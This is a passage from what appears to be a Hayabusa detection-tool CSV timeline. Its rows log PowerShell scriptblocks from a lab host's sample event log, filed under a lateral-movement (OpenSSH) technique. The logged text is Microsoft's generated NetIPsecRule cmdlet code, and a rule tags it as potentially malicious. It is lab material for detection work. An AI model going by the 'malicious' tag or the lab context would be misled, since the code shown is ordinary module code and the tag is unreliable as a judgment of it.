$__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecRule' -Alias '*' function Enable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"olicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecRule' -Alias '*' function Enable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() 